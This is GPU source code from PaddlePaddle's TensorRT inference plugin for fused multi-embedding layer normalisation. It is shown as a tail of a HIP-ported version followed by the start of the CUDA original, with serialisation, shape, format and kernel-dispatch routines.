embSkipLayerNormHFace_2<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output); } else if (nbLookupTables_ == 3) { return embSkipLayerNormHFace_3<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output); } else if (nbLookupTables_ == 4) { return embSkipLayerNormHFace_4<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t 
const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), static_cast<float const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else if (mType == nvinfer1::DataType::kHALF) { auto output = static_cast<half*>(outputs[0]); if (nbLookupTables_ == 2) { return embSkipLayerNormHFace_2<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output); } else if (nbLookupTables_ == 3) { return embSkipLayerNormHFace_3<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output); } else if (nbLookupTables_ == 4) { return embSkipLayerNormHFace_4<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), static_cast<half const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else { PADDLE_THROW(platform::errors::InvalidArgument( "Unsupported type error, expected [kHALF,kFLOAT]")); } return STATUS_SUCCESS; } int32_t EmbLayerNormVarSeqlenPluginMTron::enqueue( nvinfer1::PluginTensorDesc const* inputDesc, nvinfer1::PluginTensorDesc const* outputDesc, void const* const* inputs, void* const* outputs, void* workspace, hipStream_t stream) noexcept { int32_t batchSize = inputDesc[0].dims.d[0] - 1; // read out the maximum sequence length from the dummy input int32_t const maxSeqlen = inputDesc[nbLookupTables_].dims.d[0]; int32_t S = 384; if (maxSeqlen <= 128) { S = 128; } else if (maxSeqlen <= 192) { S = 192; } else if (maxSeqlen <= 256) { S = 256; } const float* beta = mBetaDev.get(); const float* gamma = mGammaDev.get(); if (mType == nvinfer1::DataType::kFLOAT) { auto output = static_cast<float*>(outputs[0]); auto skip = static_cast<float*>(outputs[1]); if (nbLookupTables_ == 2) { return embSkipLayerNormMTron_2<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output, skip); } else if (nbLookupTables_ == 3) { return embSkipLayerNormMTron_3<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), 
static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output, skip); } else if (nbLookupTables_ == 4) { return embSkipLayerNormMTron_4<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), static_cast<float const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output, skip); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else if (mType == nvinfer1::DataType::kHALF) { auto output = static_cast<half*>(outputs[0]); auto skip = static_cast<half*>(outputs[1]); if (nbLookupTables_ == 2) { return embSkipLayerNormMTron_2<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output, skip); } else if (nbLookupTables_ == 3) { return embSkipLayerNormMTron_3<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output, skip); } else if (nbLookupTables_ == 4) { return embSkipLayerNormMTron_4<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), static_cast<half const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output, skip); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else { PADDLE_THROW(platform::errors::InvalidArgument( "Unsupported type error, expected [kHALF,kFLOAT]")); } return STATUS_SUCCESS; } // IPluginV2Ext Methods nvinfer1::DataType EmbLayerNormVarSeqlenPluginBase::getOutputDataType( int32_t index, nvinfer1::DataType const* inputTypes, int32_t nbInputs) const noexcept { assert(index == 0 || index == 1); if (index == 0) { assert(mType == nvinfer1::DataType::kHALF || mType == nvinfer1::DataType::kFLOAT); return mType; } return nvinfer1::DataType::kHALF; } // IPluginV2 Methods char const* EmbLayerNormVarSeqlenPluginBase::getPluginType() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_NAME; } char const* EmbLayerNormVarSeqlenPluginHFace::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE; } char const* EmbLayerNormVarSeqlenPluginMTron::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON; } int32_t EmbLayerNormVarSeqlenPluginBase::getNbOutputs() const noexcept { return 3; } int32_t EmbLayerNormVarSeqlenPluginHFace::initialize() noexcept { 
TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace initialize"); return 0; } int32_t EmbLayerNormVarSeqlenPluginMTron::initialize() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron initialize"); return 0; } void EmbLayerNormVarSeqlenPluginHFace::terminate() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace terminate"); } void EmbLayerNormVarSeqlenPluginMTron::terminate() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron terminate"); } size_t EmbLayerNormVarSeqlenPluginBase::getSerializationSize() const noexcept { size_t const wordSize = getElementSize(mType); return 2 * sizeof(float) * mLd // beta + gamma + sizeof(mType) // + sizeof(mLd) // + mIdsVocabSize.size() * sizeof(mIdsVocabSize[0]) // + wordSize * mLd * accumulate( mIdsVocabSize.begin(), mIdsVocabSize.end(), 0) // ids emb + sizeof(nbLookupTables_); // numbers of lookup_table } void EmbLayerNormVarSeqlenPluginBase::serialize(void* buffer) const noexcept { serialize_value(&buffer, mType); serialize_value(&buffer, mLd); serialize_value(&buffer, nbLookupTables_); for (size_t i = 0; i < mIdsVocabSize.size(); ++i) { serialize_value(&buffer, mIdsVocabSize[i]); } char* d = static_cast<char*>(buffer); size_t const wordSize = getElementSize(mType); serFromDev(&d, mBetaDev.get(), mLd); serFromDev(&d, mGammaDev.get(), mLd); for (size_t i = 0; i < mIdsEmbPtrs.size(); ++i) { serFromDev(&d, static_cast<char*>(mIdsEmbPtrs[i]), mLd * mIdsVocabSize[i] * wordSize); } } void EmbLayerNormVarSeqlenPluginBase::destroy() noexcept { // This gets called when the network containing plugin is destroyed mBetaDev.reset(nullptr); mGammaDev.reset(nullptr); for (size_t i = 0; i < mIdsEmbPtrs.size(); ++i) { hipFree(mIdsEmbPtrs[i]); } delete this; } void EmbLayerNormVarSeqlenPluginHFace::destroy() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace destroy"); EmbLayerNormVarSeqlenPluginBase::destroy(); } void EmbLayerNormVarSeqlenPluginMTron::destroy() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron destroy"); EmbLayerNormVarSeqlenPluginBase::destroy(); } void EmbLayerNormVarSeqlenPluginBase::setPluginNamespace( char const* libNamespace) noexcept { mNamespace = libNamespace; } char const* EmbLayerNormVarSeqlenPluginBase::getPluginNamespace() const noexcept { return mNamespace.c_str(); } EmbLayerNormVarSeqlenPluginBaseCreator:: EmbLayerNormVarSeqlenPluginBaseCreator() {} char const* EmbLayerNormVarSeqlenPluginBaseCreator::getPluginName() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_NAME; } char const* EmbLayerNormVarSeqlenPluginHFaceCreator::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE; } char const* EmbLayerNormVarSeqlenPluginMTronCreator::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON; } nvinfer1::PluginFieldCollection const* EmbLayerNormVarSeqlenPluginBaseCreator::getFieldNames() noexcept { return &mFC; } bool initializeFields(nvinfer1::PluginFieldCollection const* fc, nvinfer1::Weights* beta, nvinfer1::Weights* gamma, std::vector<nvinfer1::Weights>* IdsEmb) { bool output_fp16 = false; for (int32_t i = 0; i < fc->nbFields; i++) { std::string field_name(fc->fields[i].name); if (field_name.compare("bert_embeddings_layernorm_beta") == 0) { TRANSFORMER_DEBUG_MSG("Building bert_embeddings_layernorm_beta..."); beta->values = fc->fields[i].data; beta->count = fc->fields[i].length; beta->type = fieldTypeToDataType(fc->fields[i].type); } if (field_name.compare("bert_embeddings_layernorm_gamma") == 0) { 
TRANSFORMER_DEBUG_MSG("Building bert_embeddings_layernorm_gamma..."); gamma->values = fc->fields[i].data; gamma->count = fc->fields[i].length; gamma->type = fieldTypeToDataType(fc->fields[i].type); } if (field_name.compare("output_fp16") == 0) { TRANSFORMER_DEBUG_MSG("Building output_fp16..."); assert(fc->fields[i].type == nvinfer1::PluginFieldType::kINT32); output_fp16 = static_cast<int32_t const*>(fc->fields[i].data)[0] != 0; } if (field_name.compare("bert_embeddings_word_embeddings_" + std::to_string(i - 3)) == 0) { TRANSFORMER_DEBUG_MSG( ("bert_embeddings_word_embeddings_" + std::to_string(i - 3)).c_str()); nvinfer1::Weights tem; tem.values = fc->fields[i].data; tem.count = fc->fields[i].length; tem.type = fieldTypeToDataType(fc->fields[i].type); IdsEmb->push_back(tem); } } return output_fp16; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginHFaceCreator::createPlugin( char const* name, nvinfer1::PluginFieldCollection const* fc) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenHFace createPlugin"); nvinfer1::Weights beta; nvinfer1::Weights gamma; std::vector<nvinfer1::Weights> IdsEmb; bool output_fp16 = initializeFields(fc, &beta, &gamma, &IdsEmb); TRANSFORMER_DEBUG_MSG("Building the Plugin..."); EmbLayerNormVarSeqlenPluginHFace* p = new EmbLayerNormVarSeqlenPluginHFace( name, output_fp16 ? nvinfer1::DataType::kHALF : nvinfer1::DataType::kFLOAT, beta, gamma, IdsEmb); return p; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginMTronCreator::createPlugin( char const* name, nvinfer1::PluginFieldCollection const* fc) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenMTron createPlugin"); nvinfer1::Weights beta; nvinfer1::Weights gamma; std::vector<nvinfer1::Weights> IdsEmb; bool output_fp16 = initializeFields(fc, &beta, &gamma, &IdsEmb); TRANSFORMER_DEBUG_MSG("Building the Plugin..."); EmbLayerNormVarSeqlenPluginMTron* p = new EmbLayerNormVarSeqlenPluginMTron( name, output_fp16 ? nvinfer1::DataType::kHALF : nvinfer1::DataType::kFLOAT, beta, gamma, IdsEmb); return p; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginHFaceCreator::deserializePlugin( char const* name, void const* serialData, size_t serialLength) noexcept { return new EmbLayerNormVarSeqlenPluginHFace(name, serialData, serialLength); } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginMTronCreator::deserializePlugin( char const* name, void const* serialData, size_t serialLength) noexcept { return new EmbLayerNormVarSeqlenPluginMTron(name, serialData, serialLength); } void EmbLayerNormVarSeqlenPluginBaseCreator::setPluginNamespace( char const* libNamespace) noexcept { mNamespace = libNamespace; } char const* EmbLayerNormVarSeqlenPluginBaseCreator::getPluginNamespace() const noexcept { return mNamespace.c_str(); } } // namespace plugin } // namespace tensorrt } // namespace inference } // namespace paddle
c16285441bba604609620d24dde7c4709f3457c0.cu
// Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved. // SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & // AFFILIATES. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include "paddle/fluid/inference/tensorrt/plugin/many_emb_layernorm_varseqlen_plugin.h" #include <cuda.h> #include <cstring> #include <vector> #include "NvInfer.h" namespace paddle { namespace inference { namespace tensorrt { namespace plugin { constexpr size_t threadsPerCta128 = 2 * 2 * 32; constexpr size_t threadsPerCta256 = 1 * 4 * 32; constexpr size_t threadsPerCta384 = 1 * 8 * 32; // The number of xmmas in the M dimension. We use one uint32_t per XMMA in the M // dimension: (s + 16*warps_m - 1) / (16*warps_m); constexpr size_t xmmasM128 = 4; constexpr size_t xmmasM256 = 16; constexpr size_t xmmasM384 = 24; // Packed mask size per batch. Layout is XMMAS_M * THREADS_PER_CTA. constexpr size_t packedMaskSize128 = xmmasM128 * threadsPerCta128; constexpr size_t packedMaskSize256 = xmmasM256 * threadsPerCta256; constexpr size_t packedMaskSize384 = xmmasM384 * threadsPerCta384; char const* EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE{"1"}; char const* EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON{"2"}; char const* EMB_LAYER_NORM_VAR_SEQLEN_NAME{ "ManyEmbLayerNormVarlenPluginDynamic"}; // Static class fields initialization nvinfer1::PluginFieldCollection EmbLayerNormVarSeqlenPluginBaseCreator::mFC{}; std::vector<nvinfer1::PluginField> EmbLayerNormVarSeqlenPluginBaseCreator::mPluginAttributes; EmbLayerNormVarSeqlenPluginBase::EmbLayerNormVarSeqlenPluginBase( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : mLayerName(name), mLd(beta.count), mType(type), mIdsEmb_(IdsEmb), nbLookupTables_(static_cast<int>(IdsEmb.size())) { // Assuming Weights.count is the number of elements and not bytes assert(beta.count == gamma.count); mBeta.convertAndCopy(beta, nvinfer1::DataType::kFLOAT); mGamma.convertAndCopy(gamma, nvinfer1::DataType::kFLOAT); copyToDevice(&mGamma, sizeof(float) * mGamma.count, &mGammaDev); copyToDevice(&mBeta, sizeof(float) * mBeta.count, &mBetaDev); for (size_t i = 0; i < mIdsEmb_.size(); ++i) { assert(mIdsEmb_[i].count % mLd == 0); mIdsVocabSize.push_back(int32_t(mIdsEmb_[i].count / mLd)); WeightsWithOwnership tem_weight; tem_weight.convertAndCopy(mIdsEmb_[i], mType); void* cudaMem{nullptr}; PADDLE_ENFORCE_GPU_SUCCESS( cudaMalloc(&cudaMem, getWeightsSize(tem_weight, mType))); PADDLE_ENFORCE_GPU_SUCCESS(cudaMemcpy(cudaMem, tem_weight.values, getWeightsSize(tem_weight, mType), cudaMemcpyHostToDevice)); mIdsEmbPtrs.push_back(cudaMem); } } EmbLayerNormVarSeqlenPluginBase::EmbLayerNormVarSeqlenPluginBase( std::string const& name, void const* data, size_t length) : mLayerName(name), mGammaDev(nullptr), mBetaDev(nullptr), mIdsEmbPtrs{}, mIdsEmb_{} { // Deserialize in the same order as serialization deserialize_value(&data, &length, &mType); deserialize_value(&data, &length, 
&mLd); deserialize_value(&data, &length, &nbLookupTables_); for (int32_t i = 0; i < nbLookupTables_; ++i) { int32_t tem; deserialize_value(&data, &length, &tem); mIdsVocabSize.push_back(tem); } char const* d = static_cast<char const*>(data); mBeta.convertAndCopy(&d, mLd, nvinfer1::DataType::kFLOAT); mGamma.convertAndCopy(&d, mLd, nvinfer1::DataType::kFLOAT); for (int32_t i = 0; i < nbLookupTables_; ++i) { nvinfer1::Weights pre_tem_weight; pre_tem_weight.type = mType; pre_tem_weight.count = mLd * size_t(mIdsVocabSize[i]); const auto nbBytes = mLd * size_t(mIdsVocabSize[i]) * getElementSize(mType); auto destBuf = new char[nbBytes]; pre_tem_weight.values = destBuf; std::copy_n(d, nbBytes, destBuf); d += nbBytes; mIdsEmb_.push_back(pre_tem_weight); } } EmbLayerNormVarSeqlenPluginHFace::EmbLayerNormVarSeqlenPluginHFace( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : EmbLayerNormVarSeqlenPluginBase(name, type, beta, gamma, IdsEmb) {} EmbLayerNormVarSeqlenPluginHFace::EmbLayerNormVarSeqlenPluginHFace( std::string const& name, void const* data, size_t length) : EmbLayerNormVarSeqlenPluginBase(name, data, length) { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace deserialize"); } EmbLayerNormVarSeqlenPluginMTron::EmbLayerNormVarSeqlenPluginMTron( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : EmbLayerNormVarSeqlenPluginBase(name, type, beta, gamma, IdsEmb) {} EmbLayerNormVarSeqlenPluginMTron::EmbLayerNormVarSeqlenPluginMTron( std::string const& name, void const* data, size_t length) : EmbLayerNormVarSeqlenPluginBase(name, data, length) { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron deserialize"); } // IPluginV2DynamicExt Methods nvinfer1::IPluginV2DynamicExt* EmbLayerNormVarSeqlenPluginHFace::clone() const noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace clone"); auto p = new EmbLayerNormVarSeqlenPluginHFace( mLayerName, mType, mBeta, mGamma, mIdsEmb_); p->setPluginNamespace(mNamespace.c_str()); return p; } nvinfer1::IPluginV2DynamicExt* EmbLayerNormVarSeqlenPluginMTron::clone() const noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron clone"); auto p = new EmbLayerNormVarSeqlenPluginMTron( mLayerName, mType, mBeta, mGamma, mIdsEmb_); p->setPluginNamespace(mNamespace.c_str()); return p; } nvinfer1::DimsExprs EmbLayerNormVarSeqlenPluginHFace::getOutputDimensions( int32_t outputIndex, nvinfer1::DimsExprs const* inputs, int32_t nbInputs, nvinfer1::IExprBuilder& exprBuilder) noexcept { for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].nbDims == 1); // seq length assert(inputs[i].nbDims == inputs[1].nbDims); // same shape } assert(inputs[0].nbDims == 1); // pos_id: B+1 if (outputIndex == 0) { nvinfer1::DimsExprs ret; ret.nbDims = 4; ret.d[0] = inputs[1].d[0]; // sum of seq length ret.d[1] = exprBuilder.constant(mLd); ret.d[2] = exprBuilder.constant(1); ret.d[3] = exprBuilder.constant(1); return ret; } else if (outputIndex == 1) { // This is a hack: we just report some mask size and rely the plugins to // play nicely together. // At runtime, depending on the actual maxSeqlen, the size might be // different. 
int32_t maskSize_ = packedMaskSize384; auto maskSize = exprBuilder.constant(maskSize_); auto fp16maskSize = exprBuilder.operation(nvinfer1::DimensionOperation::kPROD, *maskSize, *exprBuilder.constant(2)); auto Bplus1 = inputs[0].d[0]; // pos_id auto one = exprBuilder.constant(1); auto B = exprBuilder.operation( nvinfer1::DimensionOperation::kSUB, *Bplus1, *one); nvinfer1::DimsExprs ret; ret.nbDims = 2; ret.d[0] = B; ret.d[1] = fp16maskSize; return ret; } else { nvinfer1::DimsExprs ret; ret.nbDims = 1; ret.d[0] = inputs[nbInputs - 1].d[1]; // mask id: max seqlen return ret; } } nvinfer1::DimsExprs EmbLayerNormVarSeqlenPluginMTron::getOutputDimensions( int32_t outputIndex, nvinfer1::DimsExprs const* inputs, int32_t nbInputs, nvinfer1::IExprBuilder& exprBuilder) noexcept { // Input should be input ids and token ids and cumulative seqlens // Output should be the embeddings tensor and mask indices for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].nbDims == 1); // seq length assert(inputs[i].nbDims == inputs[1].nbDims); // same shape } assert(inputs[0].nbDims == 1); // pos_id: B+1 if (outputIndex == 0 || outputIndex == 1) { nvinfer1::DimsExprs ret; ret.nbDims = 4; ret.d[0] = inputs[1].d[0]; // sum of seq length ret.d[1] = exprBuilder.constant(mLd); ret.d[2] = exprBuilder.constant(1); ret.d[3] = exprBuilder.constant(1); return ret; } else { nvinfer1::DimsExprs ret; ret.nbDims = 1; ret.d[0] = inputs[nbInputs - 1].d[1]; // mask id: max seqlen return ret; } } bool EmbLayerNormVarSeqlenPluginBase::supportsFormatCombination( int32_t pos, nvinfer1::PluginTensorDesc const* inOut, int32_t nbInputs, int32_t nbOutputs) noexcept { assert(nbOutputs == 3); nvinfer1::PluginTensorDesc const& desc = inOut[pos]; if (desc.format != nvinfer1::TensorFormat::kLINEAR) { return false; } if (pos == 0) { // pos_id return desc.dims.nbDims == 1 && desc.type == nvinfer1::DataType::kINT32; } if (pos == 1) { // input_id return desc.dims.nbDims == 1 && desc.type == nvinfer1::DataType::kINT32; } nvinfer1::PluginTensorDesc const& prev = inOut[1]; // input_ids if (1 < pos && pos < (nbInputs - 1)) { // other ids: check it's the same as input_ids return desc.type == prev.type && desc.dims.nbDims == 1 && desc.dims.d[0] == prev.dims.d[0]; } if (pos == nbInputs - 1) { // mask id return desc.type == mType; } // embedded sequence if (pos == nbInputs) { return desc.type == mType && desc.dims.nbDims == 4 && desc.dims.d[0] == inOut[1].dims.d[0] && desc.dims.d[2] == 1 && desc.dims.d[3] == 1; } // mask(HFace) or pre_layernorm_bias(MTron) if (pos == nbInputs + 1) { return desc.type == mType; } // max seqlen if (pos == nbInputs + 2) { return desc.type == mType; } } void checkConfigurationInputs(nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { // Validate input arguments assert(nbOutputs == 3); assert(inputs[0].desc.dims.nbDims == 1); assert(inputs[0].desc.type == nvinfer1::DataType::kINT32); for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].desc.dims.nbDims == 1); assert(inputs[i].desc.dims.d[0] == inputs[1].desc.dims.d[0]); assert(inputs[i].desc.type == nvinfer1::DataType::kINT32); } assert(outputs[0].desc.dims.nbDims == 4); assert(static_cast<size_t>(outputs[0].desc.dims.d[0]) == static_cast<size_t>(inputs[1].desc.dims.d[0])); assert(outputs[0].desc.dims.d[2] == 1); assert(outputs[0].desc.dims.d[3] == 1); } void EmbLayerNormVarSeqlenPluginHFace::configurePlugin( nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, 
nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace configurePlugin"); checkConfigurationInputs(inputs, nbInputs, outputs, nbOutputs); assert(static_cast<size_t>(outputs[0].desc.dims.d[1]) == static_cast<size_t>(mLd)); int32_t const B = inputs[0].desc.dims.d[0] - 1; // check mask assert(outputs[1].desc.dims.nbDims == 2); if (B > 0) { assert(outputs[1].desc.dims.d[0] == B); } assert((outputs[1].desc.dims.d[1] == 2 * packedMaskSize384) || (outputs[1].desc.dims.d[1] == 2 * packedMaskSize128) || (outputs[1].desc.dims.d[1] == 2 * packedMaskSize256)); assert(outputs[0].desc.type == mType); assert(outputs[1].desc.type == nvinfer1::DataType::kHALF); } void EmbLayerNormVarSeqlenPluginMTron::configurePlugin( nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron configurePlugin"); checkConfigurationInputs(inputs, nbInputs, outputs, nbOutputs); assert(static_cast<size_t>(outputs[0].desc.dims.d[1]) == static_cast<size_t>(mLd)); assert(outputs[1].desc.dims.nbDims == 4); assert(static_cast<size_t>(outputs[1].desc.dims.d[0]) == static_cast<size_t>(inputs[1].desc.dims.d[0])); assert(static_cast<size_t>(outputs[1].desc.dims.d[1]) == static_cast<size_t>(mLd)); assert(outputs[1].desc.dims.d[2] == 1); assert(outputs[1].desc.dims.d[3] == 1); assert(outputs[0].desc.type == mType); assert(outputs[1].desc.type == mType); } size_t EmbLayerNormVarSeqlenPluginBase::getWorkspaceSize( nvinfer1::PluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::PluginTensorDesc const* outputs, int32_t nbOutputs) const noexcept { return 0; } int32_t EmbLayerNormVarSeqlenPluginHFace::enqueue( nvinfer1::PluginTensorDesc const* inputDesc, nvinfer1::PluginTensorDesc const* outputDesc, void const* const* inputs, void* const* outputs, void* workspace, cudaStream_t stream) noexcept { int32_t batchSize = inputDesc[0].dims.d[0] - 1; // read out the maximum sequence length from the dummy input int32_t const maxSeqlen = inputDesc[nbLookupTables_].dims.d[0]; int32_t S = 384; if (maxSeqlen <= 128) { S = 128; } else if (maxSeqlen <= 192) { S = 192; } else if (maxSeqlen <= 256) { S = 256; } const float* beta = mBetaDev.get(); const float* gamma = mGammaDev.get(); if (mType == nvinfer1::DataType::kFLOAT) { auto output = static_cast<float*>(outputs[0]); if (nbLookupTables_ == 2) { return embSkipLayerNormHFace_2<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output); } else if (nbLookupTables_ == 3) { return embSkipLayerNormHFace_3<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output); } else if (nbLookupTables_ == 4) { return embSkipLayerNormHFace_4<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), 